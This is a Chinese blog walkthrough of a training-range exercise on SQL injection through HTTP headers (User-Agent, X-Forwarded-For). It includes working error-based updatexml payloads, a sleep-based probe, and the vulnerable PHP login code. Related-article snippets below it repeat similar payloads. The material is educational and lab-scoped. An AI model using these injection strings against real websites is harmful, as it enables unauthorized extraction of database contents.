HEAD注入-(掌控安全)

已于 2023-07-15 21:28:10 修改
阅读量252 收藏 1
点赞数
文章标签: sql 数据库 网络安全
于 2023-07-15 20:43:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74410605/article/details/131742775
版权
文章介绍了SQL注入的原理,特别是通过User-Agent和X-Forwarded-For头部信息进行盲注攻击的实例。在靶场环境中,利用BurpSuite工具,通过延时注入和updatexml函数的错误报废能够揭示数据库信息,如库名、表名和字段内容,进而获取敏感数据。此外,文章也提醒了对HTTP头部信息的安全控制重要性。
摘要由CSDN通过智能技术生成

目录

一.原理

二.相关知识点

二.实例分析

一.原理

        在我们传参时,后端为了验证或者获取客户端的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了注入。

二.相关知识点

  • $_ SERVER  【包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组】
  • User-Agent其实就是你的浏览器信息。是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标 识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。
  • 没有回显的是盲注,可以尝试用updatexml()函数进行报错显示。
  • updatexml(目标xml内容,xml文档路径,更新的内容)    让路径报错显示出来,这样在“路径”位置上可以构造sql语句查询想要的信息(报错注入法)。
  • 例如updatexml(1,concat(0x7e,(select database()),0x7e),1),concat就是拼接符,0x7e是特殊字符~,不符合输入规则所以会报错,但报错的时候已经执行了子查询代码。
  • X-Forwarded-For 是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址.

二.实例分析

切记:该操作都是在靶场中进行的,未经授权不可随意用真实网站进行相关操作

  • 题型一

题目如下

除了本关考点告诉我们是head注入,还可以从源码的全局变量猜测出是head注入

首先可以用burpsuite进行爆破得到账号密码是admin/123456。

其次从上图②处的sql语句中单引号闭合的$uagent结合①处可以得出,注入点是USER_AGENT。分析之后就可以打开burpsuite开始抓包,如下图,发送至repeater。

'or sleep(5),1)

发现存在延时注入,从而进一步确认USER_AGENT是注入点。

'or updatexml(1,concat(0x7e,(select database()),0x7e),1),1)#

利用updatexml函数报错,显示出库名是head_error

'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1),1)#

接着查询表名,发现有个表名是flag_head(代码最后的,1是从图二的②处有两个单引号括起来的变量,所以后面需再跟一个,1)

'or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag_head' limit 1,1),0x7e),1),1)#

然后查询字段名,发现有flag_h1

'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1),0x7e),1),1)#

查询flag_h1里的内容 

得到flag 结束~ 

  • 题型二

题目的核心代码如下

function getip()
{
	if (getenv('HTTP_CLIENT_IP'))
	{
		$ip = getenv('HTTP_CLIENT_IP'); 
	}
	elseif (getenv('HTTP_X_FORWARDED_FOR')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED_FOR');
	}
	elseif (getenv('HTTP_X_FORWARDED')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED');
	}
	elseif (getenv('HTTP_FORWARDED_FOR'))
	{
		$ip = getenv('HTTP_FORWARDED_FOR'); 
	}
	elseif (getenv('HTTP_FORWARDED'))
	{
		$ip = getenv('HTTP_FORWARDED');
	}
	else
	{ 
		$ip = $_SERVER['REMOTE_ADDR'];
	}
	return $ip;
}
$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';

最上面的几个函数是获取ip的函数,然后通过'$ip'去确认注入点,但是抓包发现没有X-Forwarded-For请求头。

 所以在数据包中添加X-Forwarded-For请求头,并且按照题型一的解题步骤依次进行即可得出flag

 

咕噜yay
关注
head 注入
晨辰.的博客
03-21 5466
Head 注入
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3734
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
掌控安全 -- header注入
qq_53058639的博客
07-07 619
header中获取客户端的一些信息(比如useragent用户代理等其他httpheader字段信息),因为这些信息是会重新返回拼接到后台中的,所以再对这些信息进行sql处理,又因为后台没有进过相对应的信息处理所以构成了sql注入。**总结就是:在传参时,后端为了验证或者获取的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了header注入
SQL注入head、报错、盲注)
最新发布
m0_74249600的博客
08-12 1593
本文讲述了head注入、报错注入以及时间盲注与布尔盲注等sql注入的基本注入类型,之后我会继续出sql注入知识点总结直至完整,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
head注入(一)
qq_45300786的博客
07-06 3647
head(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php 攻击流程:     1;正确登录时用burp抓包。     2;测试head部分是否存在漏洞。     3;获取信息。   测试开始:     测试目标获取管理员账号密码     一些需要提前掌握的函数 order by 原为排序,注入式用来判断字段数 union select 用来判断显示位置,和链表查询(需相同字段数量) information_schema mysql自带数据库
Head注入
monkey:的博客
11-19 278
渗透测试基础-HEAD注入
weixin_45488495的博客
04-08 1123
渗透测试基础-HEAD注入PHP的超全局变量 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 在讲解HEAD注入前,得明白一些前提知识:PHP的超全局变量 PHP的超全局变量 在php中的许多预定义变量都是“超全局的”,这意味着他们在一个脚本的全部作用域中都可以使用。 创建的一些超全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取 $_POST (获取POST传参) $_GET (获
大白话图解 Linux 脏管道(Dirty Pipe) 漏洞(CVE-2022-0847)
omgFuture的博客
03-08 9710
大白话图解 Linux 脏管道(Dirty Pipe) 漏洞(CVE-2022-0847) 漏洞披露链接:https://dirtypipe.cm4all.com/ 背景 ​ 今天(2022年3月8日),开源社区爆出了Linux内核新的一级安全漏洞, Dirty Pipe Vulnerability. 漏洞点于Linux内核5.8版本引入,可以’通杀’后续多个版本内核,以及所有使用了相关Linux内核的下游厂商产品。当然,有必要说明的是,这里的通杀不是针对任意系统的远程命令执行,而是面向内
HTML表单中的安全头部设置
然而,随着网络安全威胁日益增多,保护用户提交的表单数据变得越来越重要。在这篇文章中,我们将探讨HTML表单中的安全头部设置,以提供更安全的表单提交和数据保护。 HTML表单是一个由输入字段、按钮和其他相关元素...
【封神台】Sql-Labs wp
孤桜懶契
08-15 499
前言 掌控安全里面的靶场Sql-Labs,练练手! 环境:http://inject2.lab.aqlab.cn:81/ pass-01 $username = ''; $password = ''; @$id = $_GET['id']; @$sql = 'select *from user where id='.$id; mysqli_select_db($conn,'****');// 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($
SQL注入----- head注入
weixin_45922278的博客
10-15 248
head注入 条件: 需要账号登入成功 有游客留言 有插入,储存,记录数据的功能select *from news where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)解释:由于updatexml的第二个参数需要Xpath格式的字符串,以~开头的内容不是xml格式的语法, concat()函数为字符串连接函数显然...
渗透测试基础-Head注入
学习、分享、交流
05-16 881
前提:目标网址会记录你的一些head信息,放进数据库,那么只要放进数据库,就说明与数据库产生了交互。 --> 可能就存在数据库注入漏洞。
SQL注入Head注入(一)
Mr.Huang_的博客
08-17 430
Head注入之User-Agent注入 靶场环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php 攻击流程 正确登录时用burp抓包。 测试head部分是否存在漏洞。 获取信息。 测试开始:   测试目标获取管理员账号密码   一些需要提前掌握的函数 组成 head中有访问者的各种信息,而通讯时我们若能抓到这些数据包,并将头部中这些身份信息修改则为HEAD注入。抓包实例如下(使用burp): 举列 就像图中User-Agent本意是表示你是哪种访问方式
POST注入/HEAD注入
cutjgh的博客
05-20 406
POST注入(本质是SQL注入) POST注入就是使用POST进行传参的注入,本质上与GET注入没有任何区别,注入语句在各种框里 在真实站点上,POST注入比GET注入多 POST注入高入点: 登录框 查询框 等各种和数据库有交互的框 表单在有些时候是GET传参 HEAD注入 HEAD注入 抓取的包中User_Agent,Referer,X_FORWARDED_FOR等都可能存在注入 实际上头注入就是将请求头中的数据放入数据库当作命令执行 updatexml() 更新xml文档的函数(当然还有别的报错函数,
SQL注入——POST注入 HEAD注入
weixin_41487522的博客
04-10 739
SQL注入——POST注入 HEAD注入 POST注入介绍 POST注入属于注入的一种,相信大家都知道POST和GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型没什么区别。POST一般而言不会进行URL编码,但是GET会。 POST注入高危点: 登录框 查询框 各种与数据库有交互的框 最经典的POST注入莫过于万能密码: ’ or 1=1# 万能密码原理: se...
注入全方位利用-POST注入HEAD注入
weixin_30379911的博客
08-04 689
注入全方位利用-POST注入HEAD注入 一、POST注入介绍 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 POST注入属于注入的一种,相信大家都知道POST\GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 ...
head注入(二)
qq_45300786的博客
07-06 398
head(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-08/index.php 废话就不多说了,不懂的直接看上一篇head(一) 我们可以看到核心代码是插入uagent和uname 而uagent是来自HTTP_REFERER,获取上一次的URL地址 这里和head(一)只是位置换了,head(一)是插入的请求头,而head(二)是插入的上一次的URL地址, 那么方法还是一样的,就直接做最后一步 获取字段值 注意 这里因为是用updatexml函数报错输出我们想
18、SQL HEAD注入
songling515010475的专栏
05-22 371
Head注入的区别与GET/POST的区别在于,HEAD时面的参数如果不存数据库注入进去是没有任何意义的,而GET/POST在业务增删改查过种中上肯定会要操作数据库的,但现在软件一般都有日志记录,保存到数据库中。 虽然我知道 这是Head注入,但忍不住试一下POST能不能提交,哈哈被过滤了* 进入正题: 获取数据库库名 User-Agent:’ or updatexml(1,concat(0x7e,(select database())),1),1)# User-Agent本身是用于后台识别客户端
sqlmap post注入方法
09-20
sqlmap是一种常用的自动化SQL注入工具,可以用于测试和发现应用程序中的SQL注入漏洞。在使用post注入方法时,可以通过以下步骤进行操作: 1. 使用`-u`参数指定目标URL,例如:`-u "http://xxx.xxx.com/Login.asp"` 2. 使用`--data`参数指定POST请求的数据,例如:`--data "n=1&p=1"` 3. 输入命令`sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"`来执行注入攻击 请注意,这只是一个简单的示例,实际使用时可能需要根据具体情况进行参数的调整。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值